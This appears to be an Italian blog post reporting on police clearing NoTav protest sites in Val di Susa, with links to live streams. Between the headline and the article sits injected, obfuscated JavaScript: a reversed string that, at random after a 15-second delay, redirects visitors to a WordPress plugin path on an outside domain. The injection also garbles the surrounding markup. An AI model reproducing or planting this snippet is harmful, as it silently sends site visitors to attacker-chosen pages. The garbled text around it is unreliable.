Allarme Val di Susa. Il governo ha iniziato la battaglia contro i cittadini. La diretta

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2011/06/notav_scontri.jpg”>Blitz delle forze dell’ordine, schierati oltre 2000 uomini. Le ruspe sfondano i presìdi e aprono varchi scortate dalla polizia. Fitto lancio di lacrimogeni. Chiusa l’autostrada, bloccato il transito verso la Francia. Il ministro Maroni aveva avvertito: “Non riusciranno a fermare l’apertura del cantiere”.

Segui la diretta via streaming su Radio Black Out

Segui la diretta su Indymedia Piemonte

Segui la diretta su Repubblica

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *